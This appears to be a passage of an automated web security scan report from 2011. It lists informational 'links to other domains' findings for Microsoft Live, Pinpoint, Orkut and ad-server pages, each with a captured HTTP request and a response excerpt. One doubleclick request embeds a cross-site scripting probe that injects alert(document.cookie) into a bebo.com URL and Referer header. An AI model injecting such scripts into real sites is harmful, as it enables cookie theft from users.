<td valign="top" class="css9995"><iframe src="https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="390" frameborder="0" scrolling="auto" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe>
...[SNIP]...
<td valign="top" colspan="3" class="css9996"><iframe src="https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="150" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe>
...[SNIP]...

15.21. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The page was loaded from a URL containing a query string:

https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118

The response contains the following links to other domains:

https://accountservices.passport.net/?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&bk=1309951118&vv=1100&mkt=EN-US&lc=1033&id=10
https://accountservices.passport.net/PPTOU.srf?ru=https://login.live.com/ppsecure/post.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1309951117%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttps:%252F%252Flive.zune.net%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26cb%3DB001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26id%3D75046%26bk%3D1309951118%26vv%3D1100%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033
https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033
https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0

Request

GET /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 17183
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:39 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-0ea1da25-5280-4d25-a6b0-4dcc996d385d; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1O49 V: 0
Date: Wed, 06 Jul 2011 14:08:39 GMT
Connection: close



<html dir="ltr"><head><meta http-equiv="Content-T
...[SNIP]...
<td colspan="3"><iframe src="https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="260" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe>
...[SNIP]...
<td valign="top" class="css9993"><iframe src="https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="90" height="390" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe>
...[SNIP]...
<td rowspan="3" valign="top"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071"><img src="images/LiveID16.gif?x=11.0.18163.0" alt="Windows Live ID" border="0" id="i2033" class="css0189"/>
...[SNIP]...
<td class="css0175"><a href="https://accountservices.passport.net/ppnetworkhome.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033" target="_blank" id="i1071">Windows Live ID</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&bk=1309951118&vv=1100&mkt=EN-US&lc=1033&id=10" target="_top" id="i1081">Account Services</a>
...[SNIP]...
<nobr><a href="https://accountservices.passport.net/PPTOU.srf?ru=https://login.live.com/ppsecure/post.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1309951117%26rver%3D5.5.4177.0%26wp%3DLBI%26wreply%3Dhttps:%252F%252Flive.zune.net%252Fxweb%252Flive%252Fpassport%252FsetCookies.ashx%253Frru%253DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26cb%3DB001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb%26id%3D75046%26bk%3D1309951118%26vv%3D1100%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&vv=1100&mkt=EN-US&lc=1033" target="_top" id="i1009">Terms of Use</a>
...[SNIP]...
<td valign="top" class="css9995"><iframe src="https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="390" frameborder="0" scrolling="auto" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe>
...[SNIP]...
<td valign="top" colspan="3" class="css9996"><iframe src="https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=login&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="150" frameborder="0" scrolling="no" align="bottom" marginwidth="0" marginheight="0" name="i6003"></iframe>
...[SNIP]...

15.22. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The page was loaded from a URL containing a query string:

http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1

The response contains the following link to another domain:

http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999

Request

Response

15.23. http://pinpoint.microsoft.com/en-US/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pinpoint.microsoft.com
Path:	/en-US/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://pinpoint.microsoft.com/en-US/Default.aspx?WT.mc_id=MSCOM_HP_US_BL_PinPoint

The response contains the following links to other domains:

http://m.webtrends.com/dcs2oifq100000cdaqt3mvlze_8g5h/njs.gif?dcsuri=/nojavascript&WT.js=No
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309952439&rver=6.0.5286.0&wp=LBI&wreply=http:%2F%2Fpinpoint.microsoft.com%2FWLId%2FSetCookie.ashx%3FPPLIRRUrl%3Dhttp%253a%252f%252fpinpoint.microsoft.com%252fen-US%252fDefault.aspx%253fWT.mc_id%253dMSCOM_HP_US_BL_PinPoint&lc=1033&id=256714

Request

GET /en-US/Default.aspx?WT.mc_id=MSCOM_HP_US_BL_PinPoint HTTP/1.1
Host: pinpoint.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: PP_lcName=en-US; domain=.pinpoint.microsoft.com; expires=Sat, 06-Aug-2011 11:40:39 GMT; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: PP_lcName=en-US; domain=.pinpoint.microsoft.com; expires=Sat, 06-Aug-2011 11:40:39 GMT; path=/; HttpOnly
Set-Cookie: PPUser=id=99b0f98c-b53f-4317-8eb4-109428248cf1&key=1KuSYQjssiOixeSDBGplzGrXy8zAKTOYVJZSyJMWu9Q=&cacheId=00000000-0000-0000-0000-000000000000; expires=Thu, 05-Jul-2012 11:40:39 GMT; path=/; HttpOnly
Set-Cookie: hmcs=st=&in=; path=/; HttpOnly
Set-Cookie: GASurveyCookie=GASurveyTrackingCookie_A=en-US/Default.aspx&GASurveyTrackingCookie_B=; path=/
Set-Cookie: sbp=ph=3882089720&fst=0; path=/; HttpOnly
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:40:39 GMT
Connection: close
Content-Length: 73873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Master_Head1"><me
...[SNIP]...
<div class="genSelectListC">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309952439&rver=6.0.5286.0&wp=LBI&wreply=http:%2F%2Fpinpoint.microsoft.com%2FWLId%2FSetCookie.ashx%3FPPLIRRUrl%3Dhttp%253a%252f%252fpinpoint.microsoft.com%252fen-US%252fDefault.aspx%253fWT.mc_id%253dMSCOM_HP_US_BL_PinPoint&lc=1033&id=256714" id="Master_PageHeader_passportLink" class="themeHeaderLink" title="Sign In">Sign In</a>
...[SNIP]...
<noscript>
<img border="0" name="DCSIMG" width="1" height="1" alt="" src="http://m.webtrends.com/dcs2oifq100000cdaqt3mvlze_8g5h/njs.gif?dcsuri=/nojavascript&WT.js=No"/>
</noscript>
...[SNIP]...

15.24. http://promote.orkut.com/preview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://promote.orkut.com
Path:	/preview

Issue detail

The page was loaded from a URL containing a query string:

http://promote.orkut.com/preview?nt=orkut.com&tt=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&du=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&cn=

The response contains the following links to other domains:

http://www.google.com/
http://www.google.com/images/logo_sm.gif

Request

GET /preview?nt=orkut.com&tt=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&du=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&cn= HTTP/1.1
Host: promote.orkut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=dee86d1e95d3927c:TM=1309951272:LM=1309951272:S=HWKu_4czpTSqdfbe; expires=Fri, 05-Jul-2013 11:21:12 GMT; path=/; domain=promote.orkut.com
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:12 GMT
Server: orkut_broadcast
Content-Length: 11782
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 400 (Bad Request)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;colo
...[SNIP]...
</style>
<a href=//www.google.com/ id=g><img src=//www.google.com/images/logo_sm.gif alt=Google></a>
...[SNIP]...

15.25. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The page was loaded from a URL containing a query string:

http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019

The response contains the following link to another domain:

http://adonmax.com/afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com

Request

GET /gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_728x90&page_slots=Bebo_ROS_ATF_728x90&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961818&dt=1309961818638&cc=100&oe=utf-8&biw=1164&bih=723&ifi=1&adk=4139378151&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bebo.com/c/invite8281a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea91f426563e/join
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pubads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:17:00 GMT
Server: cafe
Cache-Control: private
Content-Length: 484
X-XSS-Protection: 1; mode=block
Expires: Wed, 06 Jul 2011 14:17:00 GMT

<html><head><script></script></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<iframe src="http://adonmax.com/afr.php?campaignid=432300;what=728x90;cb=20553859530;ct0=gevalia.com" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=728 height=90></iframe>
...[SNIP]...

15.26. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The page was loaded from a URL containing a query string:

http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFRight&page_slots=Bebo_Home_300x250_ATFLeft%2CBebo_Home_300x250_ATFRight&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296837&cc=95&biw=1057&bih=822&ifi=2&adk=262378141&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697

The response contains the following links to other domains:

http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2800593&Page=&PluID=0&Pos=8211
http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBaHBaQUUUTqvdE5LslQeKyOj8D63mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCyhHAAgXIApWysAvgAgDqAhpCZWJvX0hvbWVfMzAweDI1MF9BVEZSaWdodKgDAegDwgToA9MB6AP4A_UDAACAweAEAYAGz6SZ7NvQ-unMAQ%26num%3D1%26sig%3DAGiWqty8BvNy85dWZZPNztI-FtGBFXWVVg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%2526redirectURL%253D&ord=ThRFQQAE7qsK5XYS_5okCg==&ucm=true
http://pixel.invitemedia.com/data_sync?partner_id=31&exchange_id=4
http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=ThRFQQAE7qsK5XYS_5okCuK0Y1m_SICajxJycQ&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0&managed=false

Request

GET /gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFRight&page_slots=Bebo_Home_300x250_ATFLeft%2CBebo_Home_300x250_ATFRight&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296837&cc=95&biw=1057&bih=822&ifi=2&adk=262378141&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 11:21:37 GMT
Server: cafe
Cache-Control: private
Content-Length: 3044
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBaHBaQUUUTqvdE5LslQeKyOj8D63mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCyhHAAgXIApWysAvgAgDqAhpCZWJvX0hvbWVfMzAweDI1MF9BVEZSaWdodKgDAegDwgToA9MB6AP4A_UDAACAweAEAYAGz6SZ7NvQ-unMAQ%26num%3D1%26sig%3DAGiWqty8BvNy85dWZZPNztI-FtGBFXWVVg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%2526redirectURL%25